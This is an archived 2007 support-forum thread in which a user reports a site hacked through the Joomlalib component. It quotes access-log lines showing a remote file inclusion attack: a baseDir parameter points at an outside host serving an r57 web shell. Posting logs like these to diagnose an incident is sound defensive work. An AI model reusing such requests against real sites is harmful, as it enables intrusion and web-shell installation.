Support Forum  

Go Back   Support Forum > Archives > Joomlalib Archives > User Support
Reload this Page Joomlalib hacked
Register FAQ Calendar Search Today's Posts Mark Forums Read

 
 
Thread Tools
  #1  
Old 10-09-2007, 12:41 PM
dracula dracula is offline
Active Member
  
Join Date: May 2007
Posts: 16
Default Joomlalib hacked
The site of a friend of mine was hacked recently through joomlalib 1.3.1beta, but what I see in the actual joomlalib could have the same problem!
Code:
($baseDir = dirname(__FILE__) . '/';)
....
Here is what I found in the accesslog

Code:
203.151.217.29 - - [09/Oct/2007:02:56:45 +0200] "GET //components/com_joomlalib/standalone/stubjambo9632.php?baseDir=http://www.bmcc.org.my/thief/r57.txt? HTTP/1.0" 200 12764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
203.151.217.29 - - [09/Oct/2007:02:56:58 +0200] "POST //components/com_joomlalib/standalone/stubjambo9632.php?baseDir=http://www.bmcc.org.my/thief/r57.txt? HTTP/1.0" 200 15193 "http://foo.com//components/com_joomlalib/standalone/stubjambo9632.php?baseDir=http://www.bmcc.org.my/thief/r57.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
203.151.217.29 - - [09/Oct/2007:02:57:21 +0200] "POST //components/com_joomlalib/standalone/stubjambo9632.php?baseDir=http://www.bmcc.org.my/thief/r57.txt? HTTP/1.0" 200 15256 "http://foo.com//components/com_joomlalib/standalone/stubjambo9632.php?baseDir=http://www.bmcc.org.my/thief/r57.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
203.151.217.29 - - [09/Oct/2007:02:58:17 +0200] "POST //components/com_joomlalib/standalone/stubjambo9632.php?baseDir=http://www.bmcc.org.my/thief/r57.txt? HTTP/1.0" 200 12083 "http://foo.com//components/com_joomlalib/standalone/stubjambo9632.php?baseDir=http://www.bmcc.org.my/thief/r57.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
203.151.217.29 - - [09/Oct/2007:02:58:30 +0200] "POST //components/com_joomlalib/standalone/stubjambo9632.php?baseDir=http://www.bmcc.org.my/thief/r57.txt? HTTP/1.0" 200 12083 "http://foo.com//components/com_joomlalib/standalone/stubjambo9632.php?baseDir=http://www.bmcc.org.my/thief/r57.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
203.151.217.29 - - [09/Oct/2007:02:58:44 +0200] "GET / HTTP/1.0" 200 1776 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
Last edited by dracula; 10-09-2007 at 12:45 PM.
  #2  
Old 10-09-2007, 03:00 PM
michiel_1981 michiel_1981 is offline
Administrator
  
Join Date: May 2006
Location: Nijmegen, The Netherlands
Posts: 997
Default Re: Joomlalib hacked
please post the complete code and not just that line, so I can compare it against the current and/or see if there indeed a security issue.

kind regards,
Michiel
__________________
Michiel Bijland | Django
  #3  
Old 10-09-2007, 04:45 PM
dracula dracula is offline
Active Member
  
Join Date: May 2007
Posts: 16
Default Re: Joomlalib hacked
I think this was solved. There was a post on the joomla forum.
So the new version should be safe again.
 

« Previous Thread | Next Thread »
Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off


All times are GMT. The time now is 12:18 AM.

Contact Us - Support Forum - Top

Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.
4 The Web Michiel Bijland